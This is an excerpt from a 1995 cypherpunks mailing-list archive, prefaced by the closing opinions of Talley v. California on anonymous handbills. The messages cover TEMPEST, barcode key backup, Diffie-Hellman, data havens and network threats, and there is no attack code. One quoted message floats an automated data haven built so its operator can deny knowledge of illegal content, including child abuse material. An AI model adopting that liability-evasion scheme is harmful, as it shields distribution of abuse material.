   Here the State says that this ordinance is aimed at the prevention
of "fraud, deceit, false advertising, negligent use of words,
obscenity, and libel," in that it will aid in the detection of those
responsible for spreading material of that character.  But the
ordinance is   not so limited, and I think it will not do for the
State simply to say that the circulation of all anonymous handbills
must be suppressed in order to identify the distributors of those
that may be of an obnoxious character.  In the absence of a more
substantial showing as to Los Angeles' actual experience with the
distribution  of obnoxious handbills, * such a   generality is for me
too remote to furnish a constitutionally acceptable justification for
the deterrent effect on free speech which this all-embracing
ordinance is likely to have.


   On these grounds I concur in the judgment of the Court.

Footnotes:


   * On the oral argument the City Attorney stated:

   "We were able to find out that prior to 1931 an effort was made by
the local Chamber of Commerce, urging the City Council to do
something about these handbills and advertising matters which were
false and misleading -- had no names of sponsors.  They were
particularly interested in the fictitious name. They said, 'Who are
these people that are distributing; who are advertising; doing things
of that sort?' The meager record that we were able to find indicates
that a request from the Council to the City Attorney as to their
legal opinion on this subject [sic].  The City Attorney wrote back
and formed the conclusion that distribution of handbills, pamphlets,
or other matters, without the name of the fictitious firm or officers
would be legal [sic].  Thereafter in the early part of 1932 an
ordinance was drafted, and submitted to the City Council, and
approved by them, which related to the original subject -- unlawful
for any person, firm or association to distribute in the city of Los
Angeles any advertisement or handbill -- or any other matter which
does not have the names of the sponsors of such literature."


MR. JUSTICE CLARK, whom MR. JUSTICE FRANKFURTER and MR. JUSTICE
WHITTAKER join, dissenting.

   To me, Los Angeles' ordinance cannot be read as being void on its
face. Certainly a fair reading of it does not permit a conclusion
that it prohibits the distribution of handbills "of any kind at any
time, at any place, and in any manner," Lovell v. Griffin, 303 U.S.
444, 451 (1938), as the Court seems to conclude.  In Griffin, the
ordinance completely prohibited the unlicensed distribution of any
handbills.  As I read it, the ordinance here merely prohibits the
distribution of a handbill which does not carry the identification of
the  name of the person who "printed, wrote, compiled . . .
manufactured [or] . . . caused" the distribution of it.  There could
well be a compelling reason for such a requirement.  The Court
implies as much when it observes that Los Angeles has not "referred
to any legislative history indicating" that the ordinance was adopted
for the purpose of preventing "fraud, false advertising and libel."
But even as to its legislative background there is pertinent
material which the Court overlooks.  At oral argument, the City's
chief law enforcement officer stated that the ordinance was
originally suggested in 1931 by the Los Angeles Chamber of Commerce
in a complaint to the City Council urging it to "do something about
these handbills and advertising matters which were false and
misleading." Upon inquiry by the Council, he said, the matter was
referred to his office, and the Council was advised that such an
ordinance as the present one would be valid.  He further stated that
this ordinance, relating to the original inquiry of the Chamber of
Commerce, was thereafter drafted and submitted to the Council.  It
was adopted in 1932.  In the face of this and the presumption of
validity that the ordinance enjoys, the Court nevertheless strikes it
down, stating that it "falls precisely under the ban of our prior
cases." This cannot follow, for in each of the three cases cited, the
ordinances either "forbade any distribution of literature . . .
without a license," Lovell v. Griffin, supra, or forbade, without
exception, any distribution of handbills on the streets, Jamison   v.
Texas, 318 U.S. 413 (1943);  or, as in Schneider v. State, 308 U.S.
147 (1939), which covered different ordinances in four cities, they
were either outright bans or prior restraints upon the distribution
of handbills.  I, therefore, cannot see how the Court can conclude
that the Los Angeles ordinance here "falls precisely" under any of
these cases.  On the contrary, to my mind, they neither control this
case nor are apposite to it.  In fact, in Schneider, depended upon by
the Court, it was held, through Mr. Justice Roberts, that, "In every
case . . . where legislative abridgment of the rights is asserted,
the courts should be astute to examine the effect of the challenged
legislation . . .   weigh the circumstances and . . . appraise the
substantiality of the reasons advanced . . . ." Id., at 161. The
Court here, however, makes no appraisal of the circumstances, or the
substantiality of the claims of the litigants, but strikes down the
ordinance as being "void on its face." I cannot be a party to using
such a device as an escape from the requirements of our cases, the
latest of which was handed down only last month.  Bates v. Little
Rock, 361 U.S. 516.  n1

   Therefore, before passing upon the validity of the ordinance, I
would weigh the interests of the public in its enforcement against
the claimed right of Talley.  The record is barren of any claim, much
less proof, that he will suffer any injury whatever by identifying
the handbill with his name.  Unlike N. A. A. C. P. v. Alabama, 357
U.S. 449 (1958), which is relied upon, there is neither allegation
nor proof that Talley or any group sponsoring him would suffer
"economic reprisal, loss of employment, threat of physical coercion
[or] other manifestations of public hostility." Id., at 462. Talley
makes no showing whatever to support his contention  that a restraint
upon his freedom of speech will result from the enforcement of the
ordinance.  The existence of such a restraint is necessary before we
can strike the ordinance down.

   But even if the State had this burden, which it does not, the
substantiality of Los Angeles' interest in the enforcement of the
ordinance sustains its validity.  Its chief law enforcement officer
says that the enforcement of the ordinance prevents "fraud, deceit,
false advertising, negligent use of words, obscenity, and libel,"
and, as we have said, that such was its purpose.  In the absence of
any showing to the contrary by Talley, this appears to me entirely
sufficient.

   I stand second to none in supporting Talley's right of free speech
-- but not his freedom of anonymity.  The Constitution says nothing
about freedom of anonymous speech.  In fact, this Court has approved
laws requiring no less than Los Angeles' ordinance.  I submit that
they control this case and require its approval under the attack made
here.  First, Lewis Publishing Co. v. Morgan, 229 U.S. 288 (1913),
upheld an Act of Congress requiring any newspaper using the
second-class mails to publish the names  of its editor, publisher,
owner, and stockholders.  39 U. S. C. @ 233. Second, in the Federal
Regulation of Lobbying Act, 2 U. S. C. @ 267, Congress requires those
engaged in lobbying to divulge their identities and give "a modicum
of information" to Congress. United States v. Harriss, 347 U.S. 612,
625 (1954).  Third, the several States have corrupt practices acts
outlawing, inter alia, the distribution of anonymous publications
with reference to political candidates. n2 While these statutes are
leveled at political campaign and election practices, the underlying
ground sustaining their validity applies with equal force here.

   No civil right has a greater claim to constitutional protection or
calls for more rigorous  safeguarding than voting rights.  In this
area the danger of coercion and reprisals -- economic and otherwise
-- is a matter of common knowledge.  Yet these statutes, disallowing
anonymity in promoting one's views in election campaigns, have
expressed the overwhelming public policy of the Nation.  Nevertheless
the Court is silent about this impressive authority relevant to the
disposition of this case.

      All three of the types of statutes mentioned are designed to
prevent the same abuses -- libel, slander, false accusations, etc.
The fact that some of these statutes are aimed at elections,
lobbying, and the mails makes their restraint no more palatable, nor
the abuses they prevent less deleterious to the public interest, than
the present ordinance.

   All that Los Angeles requires is that one who exercises his right
of free speech through writing or distributing handbills identify
himself just as does one who speaks from the platform.  The ordinance
makes for the responsibility in writing that is present in public
utterance.  When  and if the application of such an ordinance in a
given case encroaches on First Amendment freedoms, then will be soon
enough to strike  that application down.  But no such restraint has
been shown here.  After all, the public has some rights against which
the enforcement of freedom of speech would be "harsh and arbitrary in
itself." Kovacs v. Cooper, 336 U.S. 77, 88 (1949). We have upheld
complete proscription of uninvited door-to-door canvassing as an
invasion of privacy. Breard v. Alexandria, 341 U.S. 622 (1951). Is
this less restrictive than complete freedom of distribution --
regardless of content -- of a signed handbill? And commercial
handbills may be declared verboten, Valentine v. Chrestensen, 316
U.S. 52 (1942), regardless of content or identification.  Is Talley's
anonymous handbill, designed to destroy the business of a commercial
establishment, passed out at its very front door, and attacking its
then lawful commercial practices, more comportable with First
Amendment freedoms?  I think not.  Before we may expect international
responsibility among nations, might not it be well to require
individual responsibility at home?  Los Angeles' ordinance does no
more.

   Contrary to petitioner's contention, the ordinance as applied does
not arbitrarily deprive him of equal protection  of the law.  He
complains that handbills are singled out, while other printed media
-- books, magazines, and newspapers -- remain unrestrained.  However,
"the problem of legislative classification is a perennial one,
admitting of no doctrinaire definition.  Evils in the same field may
be of different dimensions and proportions, requiring different
remedies. . . .  Or the reform may take one step at a time,
addressing itself to the phase of the problem which seems most acute
to the legislative mind. . . .  The prohibition of the Equal
Protection Clause goes no further than the invidious discrimination.
[I] cannot say that that point has been reached here." Williamson v.
Lee Optical Co., 348 U.S. 483, 489 (1955).

   I dissent.

Footnotes

   n1 "When it is shown that state action threatens significantly to
impinge upon constitutionally protected freedom it becomes the duty
of this Court to determine whether the action bears a reasonable
relationship to the achievement of the governmental purpose asserted
as its justification." 361 U.S., at 525.

   n2 Thirty-six States have statutes prohibiting the anonymous
distribution of materials relating to elections.  E. g.: Kan. Gen.
Stat., 1949, @ 25-1714; Minn. Stat. Ann. @ 211.08; Page's Ohio Rev.
Code Ann. @ 3599.09; Purdon's Pa. Stat. Ann., Title 25, @ 3546.


_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
Washington, DC 20003                * HTTP://epic.digicash.com/epic






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Wed, 18 Jan 95 12:09:51 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: TEMPEST
Message-ID: <199501182009.AA11815@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>TEMPEST has very little to do with Cypherpunks goals, actually. First,
>buying such a gadget, tweaking it, exploring capabilities, etc., would
>lead to what? The ability to park a van in front of someone's house
>and--maybe--monitor their screens? We already know this is possible.
>(You all knew that, didn't you?)

If a Cypherpunk goal is to champion electronic privacy, it seems to me that
it is important to fully understand any threats to the methods used to
ensure privacy.  The old Sun Tzu "know your enemy" philosophy.  If I was
running a Data Haven, I'd want to understand how and if my system could be
passively eavesdropped on, and what countermeasures to take to minimize the
risk.  (Second or third down the list from knowing my encryption algorithm
was secure.)

Granted, I'd spend more efforts with firewalls because a hacker/cracker
attack would be a more realistic threat, but if there was even the most
remote chance that a government agency/well-funded concern with TEMPEST
capability was interested in me, I'd sure like to make their job more difficult.

The thing that I find frustrating about TEMPEST, is most informed people say
"yes, it's possible," but I have encountered only breadcrumbs of real-world,
technical information and sources on it (the VanEck article, the BBC tape,
Grady Ward's paper, etc.).  This is what prompted the original message to
the list.  Yes, TEMPEST is real.  But what I'm trying to do is shift out
TEMPEST reality (and capabilities) from the magical black-box in parked vans
tales.

Joel McNamara
joelm@eskimo.com - finger for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 13:09:58 PST
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: TEMPEST
In-Reply-To: <199501182009.AA11815@mail.eskimo.com>
Message-ID: <199501182032.MAA19257@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Joel McNamara wrote:

(quoting me)
> >TEMPEST has very little to do with Cypherpunks goals, actually. First,
> >buying such a gadget, tweaking it, exploring capabilities, etc., would
> >lead to what? The ability to park a van in front of someone's house
> >and--maybe--monitor their screens? We already know this is possible.
> >(You all knew that, didn't you?)
> 
> If a Cypherpunk goal is to champion electronic privacy, it seems to me that
> it is important to fully understand any threats to the methods used to
> ensure privacy.  The old Sun Tzu "know your enemy" philosophy.  If I was
> running a Data Haven, I'd want to understand how and if my system could be
> passively eavesdropped on, and what countermeasures to take to minimize the
> risk.  (Second or third down the list from knowing my encryption algorithm
> was secure.)

Sure, let us know what you find. I'm not being catty here; I'm making
a serious point about return on investment. My guess is that getting a
reasonable Van Eck capability could cost $10K, maybe less, maybe more.
And what would this show that we basically don't already know in
principle? (We've all seen televisions showing "interference" from
computers, so we know that signals are getting out....)

And if nothing is seen with our $10K of equipment, what does this
prove against an attacker who can easily afford to spend 20 or 30
times that amount to equip a van?

Cypherpunks have been exploiting technology that is comparatively
_much cheaper_ and which changes the equation.

But, again, let me not discourage you (Joel) from becoming our expert
on TEMPEST and Van Eck emissions. You may find it fun, and maybe even
profitable (consulting for corporations to harden their sites, for
example). 

I just object to the "we ought to be doing this" mentality. In
general, for reasons many of us have written about here before, and in
particular, because I think spending $10,000 to prove what we already
know--that RF emissions can be detected and demodulated--is a poor use
of money. That $10K would go a long way to getting PGP Phone finished.

> The thing that I find frustrating about TEMPEST, is most informed people say
> "yes, it's possible," but I have encountered only breadcrumbs of real-world,
> technical information and sources on it (the VanEck article, the BBC tape,
> Grady Ward's paper, etc.).  This is what prompted the original message to
> the list.  Yes, TEMPEST is real.  But what I'm trying to do is shift out
> TEMPEST reality (and capabilities) from the magical black-box in parked vans
> tales.

Then go for it. Make this your specialty, your contribution to the
Cause. But beware of empty exhortations that "somebody ought to work
on this."

"We have met the somebody, and he is us."

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>
Date: Wed, 18 Jan 95 09:49:27 PST
To: cypherpunks@toad.com
Subject: Re: Key backup (was: How do I know . ..)
Message-ID: <199501181754.MAA24686@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

'Eric Hughes' was reported to have written:

> You use your friends now because off-site storage facilities are not
> yet available.  The software for distributed remote backup has yet to
> make this operation transparent.

Even when such a system becomes available, I don't think that it will
obviate the need for relatively secure on-site storage. Banks and safe
deposit boxes haven't completely precluded the demand for safes at home.
Many people don't trust banks. Fewer will completely trust cypherbanks
and distributed.net.storage systems.

> I suspect that most private keys in the future will be held in PCMCIA
> cards (initially) and then their smaller replacements.  Backing up a
> private key to these allows use of a safe deposit box.

Safe deposit boxes, by virtue of their accessibility to law enforcement,
are subject to search and seizure under court order and are sealed
in certain cases (probate). This makes them likely to be the first place
to look when the Feds decide that we can't have keys anymore. Personally 
speaking, I'll take my chances with secure "on-site" storage, even if I 
choose a location other than my own home or business. 

>    If it's still "passphrase-protected", an attacker would a) have to know
>    what to look for

> For scalability, most people will use some standard method, whatever
> it is.  This limits the search space of an opponent.

If barcoding is our example, what's to prevent it from being printed
in a format selected by the user? Printing on a small paper/plastic
label and affixng it (in whole or in parts) to other objects effectively
disguises it as a UPC label. You would have to know which labels are
a part of a keyring for them to have any significance. Even George
Bush now knows that every commercial product has a UPC on it somewhere.
Many stores add their own UPC sticker to merchandise for inventory
control purposes. Break a keyring into 4 or 5 pieces (whatever it takes
to make each piece comparable in size and appearance to the standard UPC
label), stick them on selected objects, and let someone who knows what
they're looking for try and reconstruct your keyring from the universe of
combinations of UPC labels found around your home. With an unknown number
of parts, this seems like a practically insurmountable problem. This 
becomes a stego problem as well as a key decryption problem.

With barcoding as the standard, another person prints his key on a small
unmarked card and hides it somewhere deemed to be secure by him. The
UPC-label attack fails because his keyring isn't disguised as UPC product
labels. How does the attacker know what to look for?

True Paranoids could devise some sort of "invisible ink" method,
requiring UV or heat exposure before the barcode becomes visible.
Now your backup key looks like a blank sheet of paper. ;-)

My point is that with a regular barcode-generation program and a laser
printer, an infinite number of formats and combinations can be created
by individual users to suit their needs. You can print an 8.5 x 11 sheet
with the title "PGP secret keyring" and put it in a frame hung on the
wall, or you can print a bunch of split key pseudo-UPC labels and put one 
on the back of the frame to disguise it as the manufacturer's product label.
One method is secure and the other is not, but the specifics are left
to the user because the method is sufficiently flexible to allow a number
of formats. I contend that anyone capable of running PGP properly is
also capable of using a barcode printing program without difficulty
(check out the back of PC Magazine). All that would need to be written
is a short routine to convert the encrypted keyring into a format
suitable as input for a program of this nature. Heck, there's probably
a PD barcode program out there already.

My question to the respected elders of this list is "how or why is
this type of key backup system insecure, if it is in fact insecure?"


=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLx1VlyoZzwIn1bdtAQFT5QF+N2RGEpj37fT0iCUnPdnkaUWItbC+HHAj
eFAyBU7fNOnHGwiriHnuEcYaZxBV6lst
=l3PL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Wed, 18 Jan 95 11:42:18 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on PRZ
Message-ID: <9501181942.AA27518@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Strick wrote:
>THUS SPAKE jalicqui@prairienet.org (Jeff Licquia):
># Another quote from the article posted elsewhere said that, "PGP, which is
># based on the Diffie-Hellman public-key technology developed in the 1970s..."
># This is technically true, since all public-key work (including RSA) is based
># to some extent on DH.  It could be, however, that the author is confusing
>
>DH uses "discrete log" as the hard problem, and very straightforward
>mathematics.
>
>RSA uses "factoring" as the hard problem, and a very clever back door.
>
>How do you decide if one is based on the other?

Sorry, I wasn't perfectly clear.  Of course, RSA is not based on
Diffie-Hellman specifically; what I mean is that all public-key work is
based on that general paper, which "invented" public-key cryptography.  I
think this very confusion may be plaguing the writer of the aforementioned
article.

># public-key technology with Diffie-Hellman public-key in particular, which
># (as I understand it) is not particularly secure.
>
>It's still up in the air, isn't it, whether the discrete log or 
>factoring is the harder to crack.   My intuition is they're the
>same hard.

It was my impression that DH had a further weakness not related to the
difficulty of the hard problem.  As my copy of Schneider is at home, I must
defer to ignorance at this point.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 18 Jan 95 11:26:02 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: [ DH Code ]
In-Reply-To: <Pine.SUN.3.91.950117154344.11572B-100000@access4.digex.net>
Message-ID: <Pine.SV4.3.91.950118141055.7755A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> Are there implemented DH codes running around anywhere?

   DH code is easy - using PGP and perl you can build a simple one in a 
matter of hours.  

   But: where's the market?  The only people I've ever known to need a 
'data haven' were a group of people who'd obtained the source code to a 
major commercial operating system and used a freenet account and ftp to 
transfer it.  (40 mB+, I gather).  

   I can see building one - it doesn't seem at all difficult.  But I 
don't see how I could be reimbursed for the disk space and bandwidth.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 18 Jan 95 11:33:16 PST
To: Michael Handler <grendel@netaxs.com>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.SUN.3.91.950117183343.17037A-100000@unix3.netaxs.com>
Message-ID: <Pine.SV4.3.91.950118141828.7755B-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> 	I could write a procmail recipe and a script in about an hour to
> automatically secret-share-split and redistribute the incoming submission.

   I'll wager most of us could.  Question: whom would you redistribute it 
_TO_?  This seems to be the stumbling block - who is willing to store the 
data on their machine or net account?  Speaking as someone with about 
300k of quota left, it certainly couldn't be me, though I'd be willing to 
handle the frontend interfacing work.

   How would you handle retrieval of the data?  

> If the authorities attempt to indict you for possessing illegal
> information / kiddie porn / whatnot, they have to prove that you
> interfered with the automatic redistribution process and examined the
> contents of the submission. If you in fact did not look at the submission,
> they would have a difficult time doing so. 

   Unfortunately I've found that the U.S. government especially can make 
your life a living hell if you don't go along with their desires, even if 
you're following all the laws.  Trumped-up charges.  Fake charges.  I 
wouldn't put much past our government.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 18 Jan 95 11:34:29 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: (none)
In-Reply-To: <Pine.3.89.9501181033.A15911-0100000@netcom10>
Message-ID: <9501181934.AA02176@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> On Wed, 18 Jan 1995, Perry E. Metzger wrote:
> > Be that as it may, people HAVE been kicked off for mischief like
> > forging routing packets -- and if someone started hosing me down with
> > any one of several really nasty packet based attacks I'm familiar with
> > I would expect action to be taken against them.
> 
> Unix is broken.  Windows and DOS are fragile and under construction.

This has nothing to do with Unix, Mr. Donald. This has to do with the
nature of internet protocols.

> Servers should have built in limits, that cause them to spit back
> packets from unknown clients that are unreasonable or strain the
> system.

Can't be done. Sorry. There are certain flaws in the design of the
internet protocols down on the transport layer that I'd rather not get
into because they don't seem to be widely known and I'm not interested
in making them better known.

> For example an SMTP server should have a default limit on volume
> per address and per client, with the user being able to vary
> such limits for particular clients or addresses -- trusted or
> hostile clients.

Sendmail already has such limits. Unfortunately they ultimately do no
good. I'd try explaining, but the details get too technical -- if
people insist I'll get into it. The gist is, however, that in the
current network its too easy to fake connections. Even with per client
limits I could still make your machine die a horrible death.

> At present most unix utilities have arbitrary fixed length internal
> buffers for processing variable length fields.  If you overflow 
> the buffer by sending pathological data you will crash the system. 

Not usually, actually. The "utilities" have nothing to do with the
kernel, and the kernel is what can crash the machine.

> If you know machine code, and you overflow the buffer with 
> carefully chosen data then instead of a random crash you can
> get the server to do some particular unexpected thing -- for
> example the internet worm caused the server to execute a
> file that the mail server had just received.

Those sorts of security problems are not only well known but largely
gone. The last one, in sendmail's debug flag, could only hurt a
machine by action of a user on the machine itself, not over the
network. The sorts of things I'm talking about are *inherent* in the
design of TCP and cannot be altered at this point.

> > I doubt it. It really hasn't proved to be an actual problem thus
> > far. If anything, the limiting factor on scalability is the fact that
> > the net has no locality of reference, which is making routing design
> > harder and harder. Routing is currently THE big unsolved problem on
> > the net -- something outsiders to the IETF rarely suspect, because the
> > engineers have been faking it so well for so long. Unfortunately, all
> > the good solutions to the routing problem are mathematically
> > intractable -- and the practical ones are leading to bad potential
> > long term problems..
> 
> This is inaccurate.  Optimal solutions to the routing problem are
> mathematically intractable.  Tolerable solutions are mathematically
> tractable.

Name one, Mr. Donald. Name a single one.

> For realistic routing problems, tractable approximations
> are only worse than an optimal solution by a modest factor.

Sorry, but you just don't know what you are talking about here,
period. We don't know how to solve the routing problem in the general
case. Thats one of the reasons for all the arguments in the IETF
concerning the problems we are getting ourselves into with route
agregation.

(Just so you are clear here, Mr. Donald, the routing problem is NOT
the problem of finding an optimal path between all pairs of nodes on a
network in polynomial time -- thats solved and absolutely useless.)

> Of course I am sure Perry is correct when he says that
> the tractable approximations that we are currently using 
> fail to scale, but this is not a fundamental unsolved 
> problem in mathematics -- it is merely yet another bug.

Nope, not a bug. There are problems that we don't know how to
solve.

The problem is routing agregation, you understand, and the fact that
agregated clouds don't really experience locality of reference. This
means that we end up with nasty and totally artificial network choke
points as the networks scale. If we transmit full information,
however, we no longer get agregation and can no longer store the
tables because they are too big.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Johnson second login <exabyte!gedora!mikej2@uunet.uu.net>
Date: Thu, 19 Jan 95 01:12:38 PST
To: gedora!uunet!ingr.com!perobich@uunet.uu.net
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501121547.AA02187@poboy.b17c.ingr.com>
Message-ID: <Pine.3.89.9501181433.A14495-0100000@gedora>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Jan 1995, Paul Robichaux wrote:

> > But selecting a single cipher is just as much a fixed policy as a
> > randomly selected one is.  Far better to let the user pick a policy,
> > both about sent and accepted ciphers.
> 
> If you do give the user control, what is an acceptable mechanical
> implementation? Let's say I have a file encryptor which allows the
> user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I
> require the user to tell that program what cypher was used to encrypt
> the file she wishes to decrypt?
> 
> Is storing the cypher type as part of the encrypted file a weakness?

Perhaps it is.  The algorithm set could be part of the key, though...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 18 Jan 95 12:14:06 PST
To: Lucky Green <shamrock@netcom.com>
Subject: Re: What is this? Anonymous message failed
In-Reply-To: <v01510108ab4279f1317d@[192.0.2.1]>
Message-ID: <9501182012.AA11306@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 18 Jan 1995 09:59:54 -0800
    From: Lucky Green <shamrock@netcom.com>

    Just got back a message from Julf's remailer that my Anonymous
    message failed (wrong password). Needless to say, I didn't try to
    send one through the remailer. The message it was refering to is
    the one I sent to the list earlier. Is this a repeat of the an/na
    problems we had in the past?

Yes.  The bounce message that I got back included this header line:

  X-Envelope-To: an157790

I sent a message to <na157790@anon.penet.fi> and got back a reply
stating that the person had unsubscribed hirself and may resubscribe
``in the clear''.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 18 Jan 95 13:51:11 PST
To: jalicqui@prairienet.org (Jeff Licquia)
Subject: Re: EE Times on PRZ
Message-ID: <9501182146.AA03035@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


jalicqui@prairienet.org (Jeff Licquia) wrote:
>  It was my impression that DH had a further weakness not related to
>  the difficulty of the hard problem.  As my copy of Schneider is at
>  home, I must defer to ignorance at this point.

My understanding is that once you do the computation to solve a DH exchange   
you can use that information to easily solve any exchange under the same  
generator and modulus.  So it's important to at least use large enough  
numbers to make this unfeasable.  I think it was Suns SecureRPC that shipped  
with a fixed (and not big enough) generator and modulus and was not secure  
(assuming someone had already done the pre-computation).  Maybe this is what  
you were thinking of?

As always, proper generation of components is an important consideration in  
implementing public-key systems.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 18 Jan 95 13:27:32 PST
To: cypherpunks@toad.com
Subject: Threats in real life - what are we worried about?
Message-ID: <9501182129.AA18239@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
> TEMPEST has very little to do with Cypherpunks goals, actually. First,
> buying such a gadget, tweaking it, exploring capabilities, etc., would
> lead to what? The ability to park a van in front of someone's house
> and--maybe--monitor their screens? We already know this is possible.
> (You all knew that, didn't you?)

I disagree.  "TEMPEST" risks and countermeasures are but one entry on
a long list of subjects in which our ignorance (and that of the
civilian security community in general) may well come back to bite us.
Granted, this is the "cypherpunks" list, not the "securitypunks" list,
but it behooves anybody interested in developing strong mechanisms to
accomplish some security objective to be at least acquainted with how
those mechanisms fit in the larger picture.

One of the most dangerous aspects of cryptology (more dangerous,
perhaps, than fact that there are almost no solid theorems that tell us
how secure practical ciphers really are) is that you can measure it.
It's all too tempting to misuse an estimate for the cryptographic work
factor for some cipher as if it were some kind of overall security
metric for the systems in which it is deployed.  In real life, there
are lots of ways to violate system security, including cryptanalysis,
protocol attacks, Trojan horses, viruses, electromagnetic monitoring,
physical compromise, rubber hose cryptanalysis, OS bug exploitation,
application bug exploitation, hardware bug exploitation, user error
exploitation, physical monitoring, social engineering, court orders,
dumpster diving, and so on and so on.  Most of us on the list like to
think about cryptography and cryptographic protocols, and that's fine,
but it isn't the same as thinking about building secure systems that
are strong enough to withstand attackers who aren't willing to
restrict themselves to a strictly cryptographic threat model.

Unfortunately, the world outside the cypherpunks list isn't much
better off than we are in understanding these "informal", but all too
real, threats.  Thinking about some of them would, I think, go a long
way toward contributing to "Cypherpunk goals" as I understand them.
(Practical TEMPEST shielding is one such problem.  Another good one is
the almost completely ignored problem of storing secret keys on
networked computers.  Still another is the problem of using security
software remotely with limited local computation.  There are lots
more.)

That said, no one can force these discussions to happen, and no one,
much less me, has a right to complain that everyone else is talking
about the "wrong stuff".  So let me raise a question:
	
	Given existing crypto tools (PGP, etc), what are the top ten
	practical attacks against the privacy of stored data and
	electronic mail?  Who are the bad guys? What tools do we need
	to limit these threats?

I'll post my own thoughts later.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 16:39:11 PST
To: cypherpunks@toad.com
Subject: Good "Economist" article on Cyberspace
Message-ID: <199501190038.QAA23631@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[I'm getting no Cypherpunks list traffic today, only mail sent to me
directly, so I apologize if this has come up already.]

The Jan 14-20 issue of "The Economist" has a good article on "Who
speaks for cyberspace?,"  which does a good job of summarizing the
civil libertarian arguments and why the EFF "imploded."

...

"Little wonder that many Internet pioneers thought they had stumbled
upon an electronic Utopia....If a single set of beliefs can be said to
dominate the politics of cyberspace, it is radical libertarianism..."

About the withdrawal of the EFF from the political fray:

"That leaves cyberspace's radical libertarians without a voice in
Washington. They're probably delighted."

I know I am.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 18 Jan 95 14:01:12 PST
To: dcwill@ee.unr.edu (Dr. D.C. Williams)
Subject: Re: Key backup (was: How do I know . ..)
In-Reply-To: <199501181754.MAA24686@bb.hks.net>
Message-ID: <199501182200.RAA08888@freud.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


D.C. Williams wrote:

